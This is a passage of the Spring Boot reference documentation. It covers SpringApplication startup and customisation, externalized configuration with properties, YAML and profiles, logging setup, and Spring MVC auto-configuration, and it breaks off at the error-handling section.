org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@6e5a8246: startup date [Wed Jul 31 00:08:16 PDT 2013]; root of context hierarchy\n2014-03-04 13:09:54.912 INFO 41370 --- [ main] .t.TomcatEmbeddedServletContainerFactory : Server initialized with port: 8080\n2014-03-04 13:09:56.501 INFO 41370 --- [ main] o.s.b.s.app.SampleApplication : Started SampleApplication in 2.992 seconds (JVM running for 3.658)\n----\n\nBy default `INFO` logging messages will be shown, including some relevant startup details\nsuch as the user that launched the application.\n\n\n[[boot-features-banner]]\n=== Customizing the Banner\nThe banner that is printed on startup can be changed by adding a `banner.txt` file\nto your classpath, or by setting `banner.location` to the location of such a file.\nIf the file has an unusual encoding you can set `banner.encoding` (default is UTF-8).\n\n\n[[boot-features-customizing-spring-application]]\n=== Customizing SpringApplication\nIf the `SpringApplication` defaults aren't to your taste you can instead create a local\ninstance and customize it. For example, to turn off the banner you would write:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\tapp.setShowBanner(false);\n\t\tapp.run(args);\n\t}\n----\n\nNOTE: The constructor arguments passed to `SpringApplication` are configuration sources\nfor Spring beans. 
In most cases these will be references to `@Configuration` classes, but\nthey could also be references to XML configuration or to packages that should be scanned.\n\nIt is also possible to configure the `SpringApplication` using an `application.properties`\nfile. See '<<boot-features-external-config>>' for details.\n\nFor a complete list of the configuration options, see the\n{dc-spring-boot}\/SpringApplication.{dc-ext}[`SpringApplication` Javadoc].\n\n\n\n[[boot-features-fluent-builder-api]]\n=== Fluent builder API\nIf you need to build an `ApplicationContext` hierarchy (multiple contexts with a\nparent\/child relationship), or if you just prefer using a ``fluent'' builder API, you\ncan use the `SpringApplicationBuilder`.\n\nThe `SpringApplicationBuilder` allows you to chain together multiple method calls, and\nincludes `parent` and `child` methods that allow you to create a hierarchy.\n\nFor example:\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.showBanner(false)\n\t\t.sources(Parent.class)\n\t\t.child(Application.class)\n\t\t.run(args);\n----\n\nNOTE: There are some restrictions when creating an `ApplicationContext` hierarchy, e.g.\nWeb components *must* be contained within the child context, and the same `Environment`\nwill be used for both parent and child contexts. See the\n{dc-spring-boot}\/builder\/SpringApplicationBuilder.{dc-ext}[`SpringApplicationBuilder` javadoc]\nfor full details.\n\n\n\n[[boot-features-application-events-and-listeners]]\n=== Application events and listeners\nIn addition to the usual Spring Framework events, such as\n{spring-javadoc}\/context\/event\/ContextRefreshedEvent.{dc-ext}[`ContextRefreshedEvent`],\na `SpringApplication` sends some additional application events. Some events are actually\ntriggered before the `ApplicationContext` is created.\n\nYou can register event listeners in a number of ways, the most common being the\n`SpringApplication.addListeners(...)` method.\n\nApplication events are sent in the following order, as your application runs:\n\n. An `ApplicationStartedEvent` is sent at the start of a run, but before any\n processing except the registration of listeners and initializers.\n. An `ApplicationEnvironmentPreparedEvent` is sent when the `Environment` to be used in\n the context is known, but before the context is created.\n. An `ApplicationPreparedEvent` is sent just before the refresh is started, but after bean\n definitions have been loaded.\n. An `ApplicationFailedEvent` is sent if there is an exception on startup.\n\nTIP: You often won't need to use application events, but it can be handy to know that they\nexist. Internally, Spring Boot uses events to handle a variety of tasks.\n\n\n\n[[boot-features-web-environment]]\n=== Web environment\nA `SpringApplication` will attempt to create the right type of `ApplicationContext` on\nyour behalf. By default, an `AnnotationConfigApplicationContext` or\n`AnnotationConfigEmbeddedWebApplicationContext` will be used, depending on whether you\nare developing a web application or not.\n\nThe algorithm used to determine a ``web environment'' is fairly simplistic (based on the\npresence of a few classes). You can use `setWebEnvironment(boolean webEnvironment)` if\nyou need to override the default. 
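For instance, a minimal sketch of forcing a non-web context:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\tapp.setWebEnvironment(false);\n\t\tapp.run(args);\n\t}\n----\n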
It is also possible to take complete control of the `ApplicationContext` type that will\nbe used by calling `setApplicationContextClass(...)`.\n\nTIP: It is often desirable to call `setWebEnvironment(false)` when using `SpringApplication`\nwithin a JUnit test.\n\n\n\n[[boot-features-command-line-runner]]\n=== Using the CommandLineRunner\nIf you want access to the raw command line arguments, or you need to run some specific code\nonce the `SpringApplication` has started you can implement the `CommandLineRunner`\ninterface. The `run(String... args)` method will be called on all Spring beans\nimplementing this interface.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*;\n\timport org.springframework.stereotype.*;\n\n\t@Component\n\tpublic class MyBean implements CommandLineRunner {\n\n\t\tpublic void run(String... args) {\n\t\t\t\/\/ Do something...\n\t\t}\n\n\t}\n----\n\nYou can additionally implement the `org.springframework.core.Ordered` interface or use the\n`org.springframework.core.annotation.Order` annotation if several `CommandLineRunner`\nbeans are defined that must be called in a specific order.\n\n\n\n[[boot-features-application-exit]]\n=== Application exit\nEach `SpringApplication` will register a shutdown hook with the JVM to ensure that the\n`ApplicationContext` is closed gracefully on exit. All the standard Spring lifecycle\ncallbacks (such as the `DisposableBean` interface, or the `@PreDestroy` annotation) can\nbe used.\n\nIn addition, beans may implement the `org.springframework.boot.ExitCodeGenerator`\ninterface if they wish to return a specific exit code when the application ends.\n\n\n\n[[boot-features-external-config]]\n== Externalized Configuration\nSpring Boot allows you to externalize your configuration so you can work with the same\napplication code in different environments. You can use properties files, YAML files,\nenvironment variables and command-line arguments to externalize configuration. Property\nvalues can be injected directly into your beans using the `@Value` annotation, accessed\nvia Spring's `Environment` abstraction or bound to structured objects.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow\nsensible overriding of values; properties are considered in the following order:\n\n. Command line arguments.\n. Java System properties (`System.getProperties()`).\n. OS environment variables.\n. JNDI attributes from `java:comp\/env`.\n. A `RandomValuePropertySource` that only has properties in `random.*`.\n. Application properties outside of your packaged jar (`application.properties`\n including YAML and profile variants).\n. Application properties packaged inside your jar (`application.properties`\n including YAML and profile variants).\n. `@PropertySource` annotations on your `@Configuration` classes.\n. Default properties (specified using `SpringApplication.setDefaultProperties`).\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a\n`name` property:\n\n[source,java,indent=0]\n----\n\timport org.springframework.stereotype.*;\n\timport org.springframework.beans.factory.annotation.*;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\t@Value(\"${name}\")\n\t\tprivate String name;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can bundle an `application.properties` inside your jar that provides a sensible\ndefault `name`. 
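For instance, the packaged file might contain nothing more than (the value is illustrative):\n\n[source,properties,indent=0]\n----\n\tname=World\n----\n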
When running in production, an `application.properties` can be provided\noutside of your jar that overrides `name`; and for one-off testing, you can launch with\na specific command line switch (e.g. `java -jar app.jar --name=\"Spring\"`).\n\nThe `RandomValuePropertySource` is useful for injecting random values (e.g. into secrets\nor test cases). It can produce integers, longs or strings, e.g.\n\n[source,properties,indent=0]\n----\n\tmy.secret=${random.value}\n\tmy.number=${random.int}\n\tmy.bignumber=${random.long}\n\tmy.number.less.than.ten=${random.int(10)}\n\tmy.number.in.range=${random.int[1024,65536]}\n----\n\nThe `random.int*` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any\ncharacter and `value,max` are integers. If `max` is provided then `value` is the minimum\nvalue and `max` is the maximum (exclusive).\n\n\n\n[[boot-features-external-config-command-line-args]]\n=== Accessing command line properties\nBy default `SpringApplication` will convert any command line option arguments (starting\nwith ``--'', e.g. `--server.port=9000`) to a `property` and add it to the Spring\n`Environment`. As mentioned above, command line properties always take precedence over\nother property sources.\n\nIf you don't want command line properties to be added to the `Environment` you can disable\nthem using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[boot-features-external-config-application-property-files]]\n=== Application property files\n`SpringApplication` will load properties from `application.properties` files in the\nfollowing locations and add them to the Spring `Environment`:\n\n. A `\/config` subdir of the current directory.\n. The current directory.\n. A classpath `\/config` package.\n. The classpath root.\n\nThe list is ordered by precedence (locations higher in the list override lower items).\n\nNOTE: You can also <<boot-features-external-config-yaml, use YAML ('.yml') files>> as\nan alternative to '.properties'.\n\nIf you don't like `application.properties` as the configuration file name you can switch\nto another by specifying a `spring.config.name` environment property. You can also refer\nto an explicit location using the `spring.config.location` environment property\n(comma-separated list of directory locations, or file paths).\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nor\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.location=classpath:\/default.properties,classpath:\/override.properties\n----\n\nIf `spring.config.location` contains directories (as opposed to files) they should end\nin `\/` (and will be appended with the names generated from `spring.config.name` before\nbeing loaded). The default search path `classpath:,classpath:\/config,file:,file:config\/`\nis always used, irrespective of the value of `spring.config.location`. 
In that way you\ncan set up default values for your application in `application.properties` (or whatever\nother basename you choose with `spring.config.name`) and override it at runtime with a\ndifferent file, keeping the defaults.\n\nNOTE: If you use environment variables rather than system properties, most operating systems\ndisallow period-separated key names, but you can use underscores instead (e.g.\n`SPRING_CONFIG_NAME` instead of `spring.config.name`).\n\nNOTE: If you are running in a container then JNDI properties (in `java:comp\/env`) or\nservlet context initialization parameters can be used instead of, or as well as,\nenvironment variables or system properties.\n\n\n\n[[boot-features-external-config-profile-specific-properties]]\n=== Profile specific properties\nIn addition to `application.properties` files, profile-specific properties can also be\ndefined using the naming convention `application-{profile}.properties`.\n\nProfile-specific properties are loaded from the same locations as standard\n`application.properties`, with profile-specific files overriding the default ones.\n\n\n\n[[boot-features-external-config-placeholders-in-properties]]\n=== Placeholders in properties\nThe values in `application.properties` are filtered through the existing `Environment`\nwhen they are used so you can refer back to previously defined values (e.g. from System\nproperties).\n\n[source,properties,indent=0]\n----\n\tapp.name=MyApp\n\tapp.description=${app.name} is a Spring Boot application\n----\n\nTIP: You can also use this technique to create ``short'' variants of existing Spring Boot\nproperties. See the '<<howto.adoc#howto-use-short-command-line-arguments>>' how-to\nfor details.\n\n\n\n[[boot-features-external-config-yaml]]\n=== Using YAML instead of Properties\nhttp:\/\/yaml.org[YAML] is a superset of JSON, and as such is a very convenient format\nfor specifying hierarchical configuration data. The `SpringApplication` class will\nautomatically support YAML as an alternative to properties whenever you have the\nhttp:\/\/code.google.com\/p\/snakeyaml\/[SnakeYAML] library on your classpath.\n\nNOTE: If you use ``starter POMs'' SnakeYAML will be automatically provided via\n`spring-boot-starter`.\n\n\n\n[[boot-features-external-config-loading-yaml]]\n==== Loading YAML\nSpring Boot provides two convenient classes that can be used to load YAML documents. The\n`YamlPropertiesFactoryBean` will load YAML as `Properties` and the `YamlMapFactoryBean`\nwill load YAML as a `Map`. 
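A minimal sketch of the first of these (the file name is hypothetical, and note that the package of `YamlPropertiesFactoryBean` has moved between Spring versions, so check your own version):\n\n[source,java,indent=0]\n----\n\timport java.util.Properties;\n\n\timport org.springframework.beans.factory.config.YamlPropertiesFactoryBean;\n\timport org.springframework.core.io.ClassPathResource;\n\n\t\/\/ load application.yml from the classpath as java.util.Properties\n\tYamlPropertiesFactoryBean factory = new YamlPropertiesFactoryBean();\n\tfactory.setResources(new ClassPathResource(\"application.yml\"));\n\tProperties properties = factory.getObject();\n----\n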
For example, the following YAML document:\n\n[source,yaml,indent=0]\n----\n\tenvironments:\n\t\tdev:\n\t\t\turl: http:\/\/dev.bar.com\n\t\t\tname: Developer Setup\n\t\tprod:\n\t\t\turl: http:\/\/foo.bar.com\n\t\t\tname: My Cool App\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tenvironments.dev.url=http:\/\/dev.bar.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=http:\/\/foo.bar.com\n\tenvironments.prod.name=My Cool App\n----\n\nYAML lists are represented as property keys with `[index]` dereferencers,\nfor example this YAML:\n\n[source,yaml,indent=0]\n----\n\tmy:\n\t\tservers:\n\t\t\t- dev.bar.com\n\t\t\t- foo.bar.com\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tmy.servers[0]=dev.bar.com\n\tmy.servers[1]=foo.bar.com\n----\n\nTo bind to properties like that using the Spring `DataBinder` utilities (which is what\n`@ConfigurationProperties` does) you need to have a property in the target bean of type\n`java.util.List` (or `Set`) and you either need to provide a setter, or initialize it\nwith a mutable value, e.g. this will bind to the properties above:\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix=\"my\")\n\tpublic class Config {\n\t\tprivate List<String> servers = new ArrayList<String>();\n\n\t\tpublic List<String> getServers() {\n\t\t\treturn this.servers;\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-external-config-exposing-yaml-to-spring]]\n==== Exposing YAML as properties in the Spring Environment\nThe `YamlPropertySourceLoader` class can be used to expose YAML as a `PropertySource`\nin the Spring `Environment`. This allows you to use the familiar `@Value` annotation with\nplaceholder syntax to access YAML properties.\n\n\n\n[[boot-features-external-config-multi-profile-yaml]]\n==== Multi-profile YAML documents\nYou can specify multiple profile-specific YAML documents in a single file by\nusing a `spring.profiles` key to indicate when the document applies. For example:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t\taddress: 192.168.1.100\n\t---\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\taddress: 127.0.0.1\n\t---\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\taddress: 192.168.1.120\n----\n\nIn the example above, the `server.address` property will be `127.0.0.1` if the\n`development` profile is active. If the `development` and `production` profiles are *not*\nenabled, then the value for the property will be `192.168.1.100`.\n\n\n\n[[boot-features-external-config-yaml-shortcomings]]\n==== YAML shortcomings\nYAML files can't be loaded via the `@PropertySource` annotation. So in the\ncase that you need to load values that way, you need to use a properties file.\n\n\n\n[[boot-features-external-config-typesafe-configuration-properties]]\n=== Typesafe Configuration Properties\nUsing the `@Value(\"${property}\")` annotation to inject configuration properties can\nsometimes be cumbersome, especially if you are working with multiple properties or\nyour data is hierarchical in nature. Spring Boot provides an alternative method\nof working with properties that allows strongly typed beans to govern and validate\nthe configuration of your application. 
For example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String username;\n\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nWhen the `@EnableConfigurationProperties` annotation is applied to your `@Configuration`,\nany beans annotated with `@ConfigurationProperties` will be automatically configured\nfrom the `Environment` properties. This style of configuration works particularly well\nwith the `SpringApplication` external YAML configuration:\n\n[source,yaml,indent=0]\n----\n\t# application.yml\n\n\tconnection:\n\t\tusername: admin\n\t\tremoteAddress: 192.168.1.1\n\n\t# additional configuration as required\n----\n\nTo work with `@ConfigurationProperties` beans you can just inject them in the same way\nas any other bean.\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class MyService {\n\n\t\t@Autowired\n\t\tprivate ConnectionSettings connection;\n\n\t\t\/\/ ...\n\n\t\t@PostConstruct\n\t\tpublic void openConnection() {\n\t\t\tServer server = new Server();\n\t\t\tthis.connection.configure(server);\n\t\t}\n\n\t}\n----\n\nIt is also possible to shortcut the registration of `@ConfigurationProperties` bean\ndefinitions by simply listing the properties classes directly in the\n`@EnableConfigurationProperties` annotation:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@EnableConfigurationProperties(ConnectionSettings.class)\n\tpublic class MyConfiguration {\n\t}\n----\n\n\n\n[[boot-features-external-config-relaxed-binding]]\n==== Relaxed binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to\n`@ConfigurationProperties` beans, so there doesn't need to be an exact match between\nthe `Environment` property name and the bean property name. Common examples where this\nis useful include underscore-separated (e.g. `context_path` binds to `contextPath`), and\ncapitalized (e.g. `PORT` binds to `port`) environment properties.\n\nSpring will attempt to coerce the external application properties to the right type when\nit binds to the `@ConfigurationProperties` beans. If you need custom type conversion you\ncan provide a `ConversionService` bean (with bean id `conversionService`) or custom\nproperty editors (via a `CustomEditorConfigurer` bean).\n\n\n\n[[boot-features-external-config-validation]]\n==== @ConfigurationProperties Validation\nSpring Boot will attempt to validate external configuration, by default using JSR-303\n(if it is on the classpath). You can simply add JSR-303 `javax.validation` constraint\nannotations to your `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called\n`configurationPropertiesValidator`.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all\n`@ConfigurationProperties` beans. Simply point your web browser to `\/configprops`\nor use the equivalent JMX endpoint. See the\n'<<production-ready-features.adoc#production-ready-endpoints, Production ready features>>'\nsection for details.\n\n\n[[boot-features-profiles]]\n== Profiles\nSpring Profiles provide a way to segregate parts of your application configuration and\nmake it only available in certain environments. 
Any `@Component` or `@Configuration` can\nbe marked with `@Profile` to limit when it is loaded:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class ProductionConfiguration {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIn the normal Spring way, you can use a `spring.profiles.active`\n`Environment` property to specify which profiles are active. You can\nspecify the property in any of the usual ways, for example you could\ninclude it in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.profiles.active=dev,hsqldb\n----\n\nor specify it on the command line using the switch `--spring.profiles.active=dev,hsqldb`.\n\n\n\n[[boot-features-adding-active-profiles]]\n=== Adding active profiles\nThe `spring.profiles.active` property follows the same ordering rules as other\nproperties; the highest `PropertySource` will win. This means that you can specify\nactive profiles in `application.properties` then *replace* them using the command line\nswitch.\n\nSometimes it is useful to have profile-specific properties that *add* to the active\nprofiles rather than replace them. The `spring.profiles.include` property can be used\nto unconditionally add active profiles. The `SpringApplication` entry point also has\na Java API for setting additional profiles (i.e. on top of those activated by the\n`spring.profiles.active` property): see the `setAdditionalProfiles()` method.\n\nFor example, when an application with the following properties is run using the switch\n`--spring.profiles.active=prod` the `proddb` and `prodmq` profiles will also be activated:\n\n[source,yaml,indent=0]\n----\n\t---\n\tmy.property: fromyamlfile\n\t---\n\tspring.profiles: prod\n\tspring.profiles.include: proddb,prodmq\n----\n\nNOTE: Remember that the `spring.profiles` property can be defined in a YAML document\nto determine when this particular document is included in the configuration. See\n<<howto-change-configuration-depending-on-the-environment>> for more details.\n\n\n\n[[boot-features-programmatically-setting-profiles]]\n=== Programmatically setting profiles\nYou can programmatically set active profiles by calling\n`SpringApplication.setAdditionalProfiles(...)` before your application runs. It is also\npossible to activate profiles using Spring's `ConfigurableEnvironment` interface.\n\n\n\n[[boot-features-profile-specific-configuration]]\n=== Profile specific configuration files\nProfile-specific variants of both `application.properties` (or `application.yml`) and\nfiles referenced via `@ConfigurationProperties` are considered as files are loaded.\nSee '<<boot-features-external-config-profile-specific-properties>>' for details.\n\n\n\n[[boot-features-logging]]\n== Logging\nSpring Boot uses http:\/\/commons.apache.org\/logging[Commons Logging] for all internal\nlogging, but leaves the underlying log implementation open. Default configurations are\nprovided for\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/logging\/package-summary.html[Java Util Logging],\nhttp:\/\/logging.apache.org\/log4j\/[Log4J] and\nhttp:\/\/logback.qos.ch\/[Logback].\nIn each case there is console output and file output (rotating, 10 MB file size).\n\nBy default, if you use the ``Starter POMs'', Logback will be used for logging. Appropriate\nLogback routing is also included to ensure that dependent libraries that use\nJava Util Logging, Commons Logging, Log4J or SLF4J will all work correctly.\n\nTIP: There are a lot of logging frameworks available for Java. 
Don't worry if the above\nlist seems confusing; generally you won't need to change your logging dependencies and\nthe Spring Boot defaults will work just fine.\n\n\n\n[[boot-features-logging-format]]\n=== Log format\nThe default log output from Spring Boot looks like this:\n\n[indent=0]\n----\n2014-03-05 10:57:51.112 INFO 45469 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat\/7.0.52\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.a.c.c.C.[Tomcat].[localhost].[\/] : Initializing Spring embedded WebApplicationContext\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 1358 ms\n2014-03-05 10:57:51.698 INFO 45469 --- [ost-startStop-1] o.s.b.c.e.ServletRegistrationBean : Mapping servlet: 'dispatcherServlet' to [\/]\n2014-03-05 10:57:51.702 INFO 45469 --- [ost-startStop-1] o.s.b.c.embedded.FilterRegistrationBean : Mapping filter: 'hiddenHttpMethodFilter' to: [\/*]\n----\n\nThe following items are output:\n\n* Date and Time -- Millisecond precision and easily sortable.\n* Log Level -- `ERROR`, `WARN`, `INFO`, `DEBUG` or `TRACE`.\n* Process ID.\n* A `---` separator to distinguish the start of actual log messages.\n* Logger name -- This is usually the source class name (often abbreviated).\n* The log message.\n\n\n\n[[boot-features-logging-console-output]]\n=== Console output\nThe default log configuration will echo messages to the console as they are written. By\ndefault `ERROR`, `WARN` and `INFO` level messages are logged. To also log `DEBUG` level\nmessages to the console you can start your application with a `--debug` flag.\n\n[indent=0]\n----\n\t$ java -jar myapp.jar --debug\n----\n\nIf your terminal supports ANSI, color output will be used to aid readability.\n\n\n\n[[boot-features-logging-file-output]]\n=== File output\nBy default, log files are written to `spring.log` in your `temp` directory and rotate at\n10 MB. You can easily customize the output folder by setting the `logging.path` property\n(for example in your `application.properties`). It is also possible to change the filename\nusing a `logging.file` property. Note that if `logging.file` is used, then setting `logging.path` has no effect.\n\nAs with console output, `ERROR`, `WARN` and `INFO` level messages are logged by default.\n\n[[boot-features-custom-log-levels]]\n=== Log Levels\n\nAll the supported logging systems can have the logger levels set in the Spring\n`Environment` (so for example in `application.properties`) using ``logging.level.*=LEVEL''\nwhere ``LEVEL'' is one of TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF. Example\n`application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web: DEBUG\n\tlogging.level.org.hibernate: ERROR\n----\n\n\n\n[[boot-features-custom-log-configuration]]\n=== Custom log configuration\n\nThe various logging systems can be activated by including the appropriate libraries on\nthe classpath, and further customized by providing a suitable configuration file in the\nroot of the classpath, or in a location specified by the Spring `Environment` property\n`logging.config`. (Note however that since logging is initialized *before* the\n`ApplicationContext` is created, it isn't possible to control logging from\n`@PropertySources` in Spring `@Configuration` files. System properties and the\nconventional Spring Boot external configuration files work just fine.)\n\n
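For instance (the file name is illustrative):\n\n[source,properties,indent=0]\n----\n\tlogging.config=classpath:logging-config.xml\n----\n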
System properties and the\nconventional Spring Boot external configuration files work just fine.)\n\nDepending on your logging system, the following files will be loaded:\n\n|===\n|Logging System |Customization\n\n|Logback\n|`logback.xml`\n\n|Log4j\n|`log4j.properties` or `log4j.xml`\n\n|JDK (Java Util Logging)\n|`logging.properties`\n|===\n\nTo help with the customization some other properties are transferred from the Spring\n`Environment` to System properties:\n\n|===\n|Spring Environment |System Property |Comments\n\n|`logging.file`\n|`LOG_FILE`\n|Used in default log configuration if defined.\n\n|`logging.path`\n|`LOG_PATH`\n|Used in default log configuration if defined.\n\n|`PID`\n|`PID`\n|The current process ID (discovered if possible and when not already defined as an OS\n environment variable).\n|===\n\nAll the supported logging systems can consult System properties when parsing their\nconfiguration files. See the default configurations in `spring-boot.jar` for examples.\n\nWARNING: There are known classloading issues with Java Util Logging that cause problems\nwhen running from an ``executable jar''. We recommend that you avoid it if at all\npossible.\n\n\n\n[[boot-features-developing-web-applications]]\n== Developing web applications\nSpring Boot is well suited for web application development. You can easily create a\nself-contained HTTP server using embedded Tomcat or Jetty. Most web applications will\nuse the `spring-boot-starter-web` module to get up and running quickly.\n\nIf you haven't yet developed a Spring Boot web application you can follow the\n\"Hello World!\" example in the\n'<<getting-started.adoc#getting-started-first-application, Getting started>>' section.\n\n\n\n[[boot-features-spring-mvc]]\n=== The ``Spring Web MVC framework''\nThe Spring Web MVC framework (often referred to as simply ``Spring MVC'') is a rich\n``model view controller'' web framework. Spring MVC lets you create special `@Controller`\nor `@RestController` beans to handle incoming HTTP requests. Methods in your controller\nare mapped to HTTP using `@RequestMapping` annotations.\n\nHere is a typical example `@RestController` to serve JSON data:\n\n[source,java,indent=0]\n----\n\t@RestController\n\t@RequestMapping(value=\"\/users\")\n\tpublic class MyRestController {\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.GET)\n\t\tpublic User getUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\/customers\", method=RequestMethod.GET)\n\t\tpublic List<Customer> getUserCustomers(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.DELETE)\n\t\tpublic User deleteUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nSpring MVC is part of the core Spring Framework and detailed information is available in\nthe {spring-reference}#mvc[reference documentation]. 
There are also several guides\navailable at http:\/\/spring.io\/guides that cover Spring MVC.\n\n\n\n[[boot-features-spring-mvc-auto-configuration]]\n==== Spring MVC auto-configuration\nSpring Boot provides auto-configuration for Spring MVC that works well with most\napplications.\n\nThe auto-configuration adds the following features on top of Spring's defaults:\n\n* Inclusion of `ContentNegotiatingViewResolver` and `BeanNameViewResolver` beans.\n* Support for serving static resources, including support for WebJars (see below).\n* Automatic registration of `Converter`, `GenericConverter`, `Formatter` beans.\n* Support for `HttpMessageConverters` (see below).\n* Automatic registration of `MessageCodesResolver` (see below).\n* Static `index.html` support.\n* Custom `Favicon` support.\n\nIf you want to take complete control of Spring MVC, you can add your own `@Configuration`\nannotated with `@EnableWebMvc`. If you want to keep Spring Boot MVC features, and\nyou just want to add additional {spring-reference}#mvc[MVC configuration] (interceptors,\nformatters, view controllers etc.) you can add your own `@Bean` of type\n`WebMvcConfigurerAdapter`, but *without* `@EnableWebMvc`.
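\n\nFor example, a minimal sketch of such a bean (the view controller mapping is\nillustrative):\n\n[source,java,indent=0]\n----\n\timport org.springframework.context.annotation.Configuration;\n\timport org.springframework.web.servlet.config.annotation.*;\n\n\t@Configuration\n\tpublic class MyMvcConfiguration extends WebMvcConfigurerAdapter {\n\n\t\t@Override\n\t\tpublic void addViewControllers(ViewControllerRegistry registry) {\n\t\t\t\/\/ render the 'home' view for GET \/home without writing a controller\n\t\t\tregistry.addViewController(\"\/home\").setViewName(\"home\");\n\t\t}\n\n\t}\n----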
\n\n\n\n[[boot-features-spring-mvc-message-converters]]\n==== HttpMessageConverters\nSpring MVC uses the `HttpMessageConverter` interface to convert HTTP requests and\nresponses. Sensible defaults are included out of the box, for example Objects can be\nautomatically converted to JSON (using the Jackson library) or XML (using JAXB).\n\nIf you need to add or customize converters you can use Spring Boot's\n`HttpMessageConverters` class:\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.web.HttpMessageConverters;\n\timport org.springframework.context.annotation.*;\n\timport org.springframework.http.converter.*;\n\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic HttpMessageConverters customConverters() {\n\t\t\tHttpMessageConverter<?> additional = ...\n\t\t\tHttpMessageConverter<?> another = ...\n\t\t\treturn new HttpMessageConverters(additional, another);\n\t\t}\n\n\t}\n----\n\n[[boot-features-spring-message-codes]]\n==== MessageCodesResolver\nSpring MVC has a strategy for generating error codes for rendering error messages\nfrom binding errors: `MessageCodesResolver`. Spring Boot will create one for you if\nyou set the `spring.mvc.message-codes-resolver.format` property to `PREFIX_ERROR_CODE` or\n`POSTFIX_ERROR_CODE` (see the enumeration in `DefaultMessageCodesResolver.Format`).\n\n\n\n[[boot-features-spring-mvc-static-content]]\n==== Static Content\nBy default Spring Boot will serve static content from a folder called `\/static` (or\n`\/public` or `\/resources` or `\/META-INF\/resources`) in the classpath or from the root\nof the `ServletContext`. It uses the `ResourceHttpRequestHandler` from Spring MVC so you\ncan modify that behavior by adding your own `WebMvcConfigurerAdapter` and overriding the\n`addResourceHandlers` method.\n\nIn a stand-alone web application the default servlet from the container is also\nenabled, and acts as a fallback, serving content from the root of the `ServletContext` if\nSpring decides not to handle it. Most of the time this will not happen (unless you modify\nthe default MVC configuration) because Spring will always be able to handle requests\nthrough the `DispatcherServlet`.\n\nIn addition to the ``standard'' static resource locations above, a special case is made for\nhttp:\/\/www.webjars.org\/[Webjars content]. Any resources with a path in `\/webjars\/**` will\nbe served from jar files if they are packaged in the Webjars format.\n\nTIP: Do not use the `src\/main\/webapp` folder if your application will be packaged as a\njar. Although this folder is a common standard, it will *only* work with war packaging\nand it will be silently ignored by most build tools if you generate a jar.\n\n\n\n[[boot-features-spring-mvc-template-engines]]\n==== Template engines\n\nAs well as REST web services, you can also use Spring MVC to serve dynamic HTML content.\nSpring MVC supports a variety of templating technologies including Velocity, FreeMarker\nand JSPs. Many other templating engines also ship their own Spring MVC integrations.\n\nSpring Boot includes auto-configuration support for the following templating engines:\n\n * http:\/\/freemarker.org\/docs\/[FreeMarker]\n * http:\/\/beta.groovy-lang.org\/docs\/groovy-2.3.0\/html\/documentation\/markup-template-engine.html[Groovy]\n * http:\/\/www.thymeleaf.org[Thymeleaf]\n * http:\/\/velocity.apache.org[Velocity]\n\nWhen you're using one of these templating engines with the default configuration, your templates\nwill be picked up automatically from `src\/main\/resources\/templates`.\n\nTIP: JSPs should be avoided if possible, as there are several\n<<boot-features-jsp-limitations, known limitations>> when using them with embedded\nservlet containers.\n\n\n\n[[boot-features-error-handling]]\n==== Error Handling\nSpring Boot provides an `\/error` 